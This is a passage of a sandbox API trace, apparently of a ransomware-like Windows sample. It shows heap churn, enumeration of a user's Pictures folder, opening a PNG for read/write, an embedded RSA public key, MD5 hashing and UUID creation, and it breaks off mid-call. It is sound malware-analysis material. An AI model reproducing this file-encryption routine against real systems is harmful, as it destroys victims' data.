dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.424] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.425] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.425] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.425] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.426] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.426] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.426] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.430] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.430] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0199.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0199.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0199.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0199.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0199.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0199.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0199.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0199.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.443] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.443] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.444] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.444] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0199.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0199.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0199.447] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.447] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0199.447] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0199.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0199.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0199.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.458] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\") returned="KiR-tAs9lgdEh FXubwY\\" [0199.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0199.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f468 [0199.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.460] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\") returned="Pictures\\" [0199.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8f468 | out: hHeap=0x620000) returned 1 [0199.460] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0199.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0199.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.461] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0199.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0199.461] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0199.461] PathFindFileNameW (pszPath="") returned="" [0199.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.462] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\*" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39fafd10, ftCreationTime.dwHighDateTime=0x1d8a6d3, ftLastAccessTime.dwLowDateTime=0x5c1aec20, ftLastAccessTime.dwHighDateTime=0x1d8a6fb, ftLastWriteTime.dwLowDateTime=0x5c1aec20, ftLastWriteTime.dwHighDateTime=0x1d8a6fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0199.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.463] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39fafd10, ftCreationTime.dwHighDateTime=0x1d8a6d3, ftLastAccessTime.dwLowDateTime=0x5c1aec20, ftLastAccessTime.dwHighDateTime=0x1d8a6fb, ftLastWriteTime.dwLowDateTime=0x5c1aec20, ftLastWriteTime.dwHighDateTime=0x1d8a6fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0199.463] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8eef660, ftCreationTime.dwHighDateTime=0x1d89717, ftLastAccessTime.dwLowDateTime=0x92b060c0, ftLastAccessTime.dwHighDateTime=0x1d89af4, ftLastWriteTime.dwLowDateTime=0x92b060c0, ftLastWriteTime.dwHighDateTime=0x1d89af4, nFileSizeHigh=0x0, nFileSizeLow=0x149e9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-F78Z7ifiP0.png", cAlternateFileName="-F78Z7~1.PNG")) returned 1 [0199.463] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\-F78Z7ifiP0.png") returned=".png" [0199.463] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\-F78Z7ifiP0.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\-f78z7ifip0.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0199.465] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=84457) returned 1 [0199.465] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0199.468] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x149c3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.468] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0199.469] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x149e9, lpOverlapped=0x0) returned 1 [0199.471] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0199.471] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.471] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.471] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0199.472] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0199.472] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0199.472] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0199.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0199.472] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0199.472] GetLastError () returned 0x0 [0199.472] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0199.472] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0199.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.473] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0199.473] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0199.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0199.473] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0199.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x149f0) returned 0x2ea79b0 [0199.474] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0199.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0199.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0199.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0199.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0199.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0199.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f468 [0199.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30e0 [0199.474] RtlAllocateHeap 